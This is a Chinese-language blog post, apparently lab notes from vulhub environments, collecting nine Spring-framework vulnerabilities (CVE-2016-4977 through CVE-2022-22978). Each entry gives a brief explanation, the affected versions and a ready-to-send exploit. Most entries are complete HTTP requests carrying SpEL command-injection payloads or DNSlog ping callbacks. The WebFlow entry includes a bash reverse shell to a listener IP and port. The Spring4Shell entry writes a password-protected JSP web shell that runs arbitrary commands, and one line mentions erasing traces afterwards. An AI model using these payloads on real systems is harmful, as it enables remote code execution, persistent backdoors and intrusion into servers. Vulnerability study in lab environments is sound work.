1.Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)
1)漏洞原理:
Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。
2)操作技巧:
需要输入密码admin : admin
http://192.168.68.129:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test
3)漏洞版本:
2.0.0 to 2.0.9
1.0.0 to 1.0.5
2.Spring WebFlow 远程代码执行漏洞(CVE-2017-4971)
1)漏洞原理:
Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。
2)操作技巧:
在post请求体中加上_eventId_confirm=&_csrf=4962b53e-b8c7-4290-8fa4-10dd87fd6ead&_(new java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.10.7/2233 +0>%261")).start()=vulhub
3)漏洞版本:Spring Web Flow 2.4.0 to 2.4.4
3.Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)
1)漏洞原理:Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。
2)操作技巧:
PATCH /customers/1 HTTP/1.1
Host: 192.168.68.129:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 212
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{112,105,110,103,32,122,120,54,108,97,115,46,100,110,115,108,111,103,46,99,110}))/lastname", "value": "vulhub" }]
3)漏洞版本:
Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
Spring Boot version < 2.0.0M4
Spring Data release trains < Kay-RC3
4.Spring Messaging 远程命令执行漏洞(CVE-2018-1270)
1)漏洞原理:
2)操作技巧:
在app.js包中找到connect函数,加入var header = {"selector":"T(java.lang.Runtime).getRuntime().exec('calc.exe')"};
然后连接好,随便发送一个字段就可以
3)漏洞版本:
Spring Framework 5.0 to 5.0.4.
Spring Framework 4.3 to 4.3.14
5.Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)
1)漏洞原理:
2)操作技巧:
POST /users?page=4&size=5 HTTP/1.1
Host: 192.168.68.129:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.129:8080/users?page=&size=5
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("ping 8hjpmg.dnslog.cn")]=&password=&repeatedPassword=
3)漏洞版本:
Spring Data Commons 1.13 to 1.13.10 (Ingalls SR10)
Spring Data REST 2.6 to 2.6.10 (Ingalls SR10)
Spring Data Commons 2.0 to 2.0.5 (Kay SR5)
Spring Data REST 3.0 to 3.0.5 (Kay SR5)
Older unsupported versions are also affected
6.Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)
1)漏洞原理:
2)操作技巧:
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.68.129:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=040E58DCCE5809AD2948AC3AA317BE8D
If-None-Match: "3147526947+gzip"
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
Connection: close
Content-Type: application/json
Content-Length: 329
{
"id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.68.129:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=040E58DCCE5809AD2948AC3AA317BE8D
If-None-Match: "3147526947+gzip"
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
访问http://192.168.68.129:8080/actuator/gateway/routes/hacktest
后续还有删除痕迹工作
3)漏洞版本:
Spring Cloud Gateway
3.1.0
3.0.0 to 3.0.6
Older, unsupported versions are also affected
7.Spring Cloud Function SpEL Code Injection (CVE-2022-22963)
1)漏洞原理:
2)操作技巧:
POST /functionRouter HTTP/1.1
Host: 192.168.68.129:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping 3692av.dnslog.cn")
Content-Type: text/plain
Content-Length: 4
test
3)漏洞版本:
Spring Cloud Function 3.1.6 3.2.2 Older, unsupported versions are also affected
8.Spring Framework RCE via Data Binding on JDK 9+ (CVE-2022-22965)
1)漏洞原理:
2)操作技巧:
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.68.129:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=84F9ECE52FD5260993C778C305D5BAD7
Connection: close
suffix:%>//
c1:Runtime
c2:<%
DNT:1
访问:http://192.168.68.129:8080/tomcatwar.jsp?pwd=j&cmd=id即可
3)漏洞版本:
Spring Framework
5.3.0 to 5.3.17
5.2.0 to 5.2.19
Older, unsupported versions are also affected
9.Spring Security Authorization Bypass in RegexRequestMatcher(CVE-2022-22978)
1)漏洞原理:
2)操作技巧:
http://192.168.68.129:8080/admin/%0atest
3)漏洞版本:
Spring Security 5.5.x < 5.5.7
Spring Security 5.6.x < 5.6.4
4885
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
